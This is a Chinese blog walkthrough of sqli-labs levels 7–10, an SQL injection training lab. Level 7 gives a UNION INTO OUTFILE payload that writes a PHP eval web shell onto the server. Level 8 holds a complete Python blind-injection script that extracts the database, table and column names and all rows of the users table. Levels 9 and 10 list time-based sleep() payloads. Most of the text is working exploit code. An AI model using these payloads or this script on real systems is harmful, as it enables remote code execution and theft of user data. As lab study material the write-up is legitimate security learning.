
sqli-labs less7-10

[TOC]

less-7:GET-基于错误-双引号-文件导出

练习mysql的文件写入。我们的目的是将一句话木马写入到网站的Less-7目录下

先用 ' 和 " 之类的引号测试
发现用 " 时返回页面无变化,用 ' 时返回页面出错,说明查询结构肯定是带 ' 的。

‘ 的返回页面为:

但是绝对和单引号有关,所以试试 ‘) , ‘))

‘) 也错了

‘)) 返回页面正常!!

说明sql语句应该是这样:

 select * from table where id = (('input'));

http://43.247.91.228:84/Less-7/?id=1‘)) union select 1,2,”<?php @eval($_POST[‘cmd’]); ?>” into outfile “/var/www/html/dd1.php”

less-8:GET-基于布尔类型-盲注

发现加了单引号与不加时页面显示不同:加了单引号后连 You are in 都不显示了,也没有报错,所以只能用盲注来判断。
http://43.247.91.228:84/Less-8/?id=1‘ and ascii(substr((select database()),1,1))>64 %23

放一个脚本:

# coding: utf-8

import urllib2
import urllib

success_str = "You are in"  # substring of the lab's normal page; its presence is the boolean oracle
getTable = "users"  # table whose columns and rows inject() dumps

index = "0"  # not referenced anywhere in this listing
url = "http://43.247.91.228:84/Less-8/?id=1"  # lab URL from the article; every probe appends a quoted payload
database = "database()"  # expression handed to lengthPayload to measure the current DB name
selectDB = "select database()"  # subquery handed to asciiPayload to read the DB name one character at a time
# two %-slots: schema name, then a 0-based LIMIT offset
selectTable = "select table_name from information_schema.tables where table_schema='%s' limit %d,1"

# %-templates filled by getResult / getLengthResult and URL-encoded onto url.
# Each one closes the id literal with ' and comments out the rest of the query with #
asciiPayload = "' and ascii(substr((%s),%d,1))>=%d #"  # slots: (subquery, position, ascii) -> true iff char >= ascii
lengthPayload = "' and length(%s)>=%d #"  # slots: (expression, length) -> true iff length >= length
selectTableCountPayload = "'and (select count(table_name) from information_schema.tables where table_schema='%s')>=%d #"  # slots: (schema, count)

# split template: inject() splices the LIMIT offset between the two halves, then fills (schema, length)
selectTableNameLengthPayloadfront = "'and (select length(table_name) from information_schema.tables where table_schema='%s' limit "
selectTableNameLengthPayloadbehind = ",1)>=%d #"

# Measure the length of an SQL expression through the boolean oracle.
def getLengthOfString(payload, string):
    """Return the length of the SQL expression *string* using boolean-blind probes.

    payload: %-template with (string, length) slots, answered by getLengthResult
    string: the expression (or count subquery) whose "length" is measured
    Phase 1 raises an upper bound in steps of 5 starting at 10; phase 2 bisects
    the interval [lengthLeft, lengthRigth). Every probe is one HTTP request.
    The listing is Python 2 (urllib2, print statements), so `/` below is integer
    division; under Python 3 it would yield floats.
    """
    # guess the length
    lengthLeft = 0
    lengthRigth = 0
    guess = 10
    # find an upper bound: while the oracle confirms length >= guess, raise guess by 5
    while 1:
        # true when the length is >= guess
        if getLengthResult(payload, string, guess) == True:
            # raise the guess by 5
            guess = guess + 5
        else:
            lengthRigth = guess
            break
            # print "lengthRigth: " + str(lengthRigth)
    # bisect for the exact length
    mid = (lengthLeft + lengthRigth) / 2
    while lengthLeft < lengthRigth - 1:
        # if the length is >= mid
        if getLengthResult(payload, string, mid) == True:
            # move the lower bound up to mid
            lengthLeft = mid
        else:
            # otherwise the length is < mid
            # move the upper bound down to mid
            lengthRigth = mid
            # recompute the midpoint
        mid = (lengthLeft + lengthRigth) / 2
        # print lengthLeft, lengthRigth
    # lengthLeft is only ever set to a value the oracle confirmed (length >= mid) and
    # lengthRigth only to one it denied (length < mid), so lengthLeft <= length < lengthRigth.
    # The loop stops once lengthLeft == lengthRigth - 1, which pins the length to lengthLeft.
    # e.g. the last step leaves lengthLeft = 8, lengthRigth = 9: 8 <= length < 9, so length == 8.
    return lengthLeft


# Read the value of an SQL subquery one character at a time through the boolean oracle.
def getName(payload, string, lengthOfString):
    """Return the value of the SQL subquery *string*, recovered character by character.

    payload: %-template with (subquery, position, ascii) slots, answered by getResult
    string: the subquery whose value is read
    lengthOfString: number of characters to read (positions 1..lengthOfString, 1-based)
    Each character is found by bisecting the ASCII interval [32, 127) with the
    oracle "ascii(char) >= mid", roughly seven requests per character.
    Only codes 32..126 are recoverable: a code below 32 leaves left at 32 and
    yields a space, a code of 127 or above collapses to chr(126).
    """
    # 32 is the space, the first printable character; 127 is DEL, the last one
    tmp = ''
    for i in xrange(1, lengthOfString + 1):
        left = 32
        right = 127
        mid = (left + right) / 2
        while left < right - 1:
            # if the ascii code of character i is >= mid
            if getResult(payload, string, i, mid) == True:
                # raise the lower bound
                left = mid
                mid = (left + right) / 2  # recomputed again below; harmless duplicate
            else:
                # otherwise the ascii code of character i is < mid
                # lower the upper bound
                right = mid
                # recompute the midpoint
            mid = (left + right) / 2
        tmp += chr(left)
    return tmp


# Send one length probe and turn the page into the oracle's boolean answer.
# payload: template with (string, length) slots; string: expression being measured;
# length: candidate length. True iff the response body contains success_str.
def getLengthResult(payload, string, length):
    """Return True when the target confirms "length(string) >= length".

    Fills *payload*, URL-encodes it onto the module-level *url*, fetches the
    result with urllib2 and checks the body for success_str. There is no
    timeout and no error handling, so an HTTP or socket failure propagates.
    Server-side, each probe is a plain GET whose query string carries the
    quoted template (length(...)>=...), which is what access-log review and
    WAF signatures key on.
    """
    probe = payload % (string, length)
    response = urllib2.urlopen(url + urllib.quote(probe))
    body = response.read()
    return success_str in body



# 发送请求,根据页面的返回判断猜测的字符是否正确
# payload:使用的payload    string:猜测的字符串   pos:猜测字符串的位置    ascii:猜测的ascii
def getResult(payload, string, pos, ascii):
    """Return True when the target confirms "ascii(char pos of string) >= ascii".

    payload: template with (subquery, position, ascii) slots
    string: the subquery being read; pos: 1-based character position;
    ascii: candidate ASCII code. The probe is URL-encoded onto the module-level
    *url* and fetched with urllib2; the answer is whether success_str appears in
    the body. No timeout or error handling: failures propagate to the caller.
    """
    probe = payload % (string, pos, ascii)
    response = urllib2.urlopen(url + urllib.quote(probe))
    body = response.read()
    return success_str in body



# Drive the whole extraction: database name, table names, then the columns and rows of getTable.
def inject():
    """Dump the current database name, its table names and every row of getTable.

    Everything is read through getLengthOfString / getName, so each value costs
    one request per bisection step. Output goes through Python 2 print statements;
    there is no return value. Side effects: HTTP GETs against the module-level url.
    """
    # length of the database name
    lengthOfDBName = getLengthOfString(lengthPayload, database)
    print "length of DBname: " + str(lengthOfDBName)
    # the database name itself
    DBname = getName(asciiPayload, selectDB, lengthOfDBName)

    print "current database:" + DBname

    # number of tables in that database (a count is "measured" the same way as a length)
    # print selectTableCountPayload
    tableCount = getLengthOfString(selectTableCountPayload, DBname)
    print "count of talbe:" + str(tableCount)  # "talbe" is a typo in the runtime string, kept as-is

    # each table name
    for i in xrange(0, tableCount):
        # table index
        num = str(i)
        # length of this table's name; the LIMIT offset is spliced between the two template halves
        selectTableNameLengthPayload = selectTableNameLengthPayloadfront + num + selectTableNameLengthPayloadbehind
        tableNameLength = getLengthOfString(selectTableNameLengthPayload, DBname)
        print "current table length:" + str(tableNameLength)
        # the table name itself
        selectTableName = selectTable % (DBname, i)
        tableName = getName(asciiPayload, selectTableName, tableNameLength)
        print tableName

    # DBname is embedded directly; the remaining %s/%d slots take the table name and the count
    selectColumnCountPayload = "'and (select count(column_name) from information_schema.columns where table_schema='" + DBname + "' and table_name='%s')>=%d #"
    # print selectColumnCountPayload
    # number of columns in getTable
    columnCount = getLengthOfString(selectColumnCountPayload, getTable)
    print "table:" + getTable + " --count of column:" + str(columnCount)

    # number of rows in getTable
    dataCountPayload = "'and (select count(*) from %s)>=%d #"
    dataCount = getLengthOfString(dataCountPayload, getTable)
    print "table:" + getTable + " --count of data: " + str(dataCount)

    data = []  # one list per column: [columnName, row 0, row 1, ...]
    # each column of getTable
    for i in xrange(0, columnCount):
        # length of this column's name
        selectColumnNameLengthPayload = "'and (select length(column_name) from information_schema.columns where table_schema='" + DBname + "' and table_name='%s' limit " + str(
            i) + ",1)>=%d #"
        # print selectColumnNameLengthPayload
        columnNameLength = getLengthOfString(selectColumnNameLengthPayload, getTable)
        print "current column length:" + str(columnNameLength)
        # the column name itself
        selectColumn = "select column_name from information_schema.columns where table_schema='" + DBname + "' and table_name='%s' limit %d,1"
        selectColumnName = selectColumn % (getTable, i)
        # print selectColumnName
        columnName = getName(asciiPayload, selectColumnName, columnNameLength)
        print columnName

        tmpData = []
        tmpData.append(columnName)
        # every row of this column
        for j in xrange(0, dataCount):
            columnDataLengthPayload = "'and (select length(" + columnName + ") from %s limit " + str(j) + ",1)>=%d #"
            # print columnDataLengthPayload
            columnDataLength = getLengthOfString(columnDataLengthPayload, getTable)
            # print columnDataLength
            # NOTE(review): the table is hard-coded as "users" here, while the length probe above uses getTable
            selectData = "select " + columnName + " from users limit " + str(j) + ",1"
            columnData = getName(asciiPayload, selectData, columnDataLength)
            # print columnData
            tmpData.append(columnData)

        data.append(tmpData)

        # print data
    # formatted output
    # header row: the column names
    tmp = ""
    for i in xrange(0, len(data)):
        tmp += data[i][0] + "   "
    print tmp
    # data rows: index 0 of each column list is the name, rows occupy 1..dataCount
    for j in xrange(1, dataCount + 1):
        tmp = ""
        for i in xrange(0, len(data)):
            tmp += data[i][j] + "   "
        print tmp



# Script entry point: print a banner, then run the full extraction (Python 2 print statement).
if __name__ == "__main__":
    print "-----------inject starting----------"
    inject()

与less5相似

less-9:GET-基于时间类型-盲注

基于时间的盲注,只用修改一下上面的python脚本即可实现,加个时间判断,payload:
http://127.0.0.1/sql/Less-9/?id=1‘ and if(ascii(substr(database(),1,1))>115, 0, sleep(2)) %23
这里if判断为真,所以会执行sleep(2),查询操作会有明显的延迟。如果为假,即不正确,那么就不会执行sleep(2),页面回显会明显的很快。
在了解了这些基本知识之后,我们使用以下 payload 来进行 SQL 注入
http://192.168.1.158/sqli-labs/Less-8/?id=1‘ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+

Less-10

第10关只要把前面两关payload部分的单引号改成双引号即可。
猜测数据库:
http://127.0.0.1/sqllib/Less-10/?id=1"and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:sqli-labs less7-10

文章字数:1,430

本文作者:Mang0

发布时间:2018-04-02, 16:15:23

最后更新:2018-11-02, 21:52:15

原始链接:http://mang0.me/archis/9a0d7777/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。
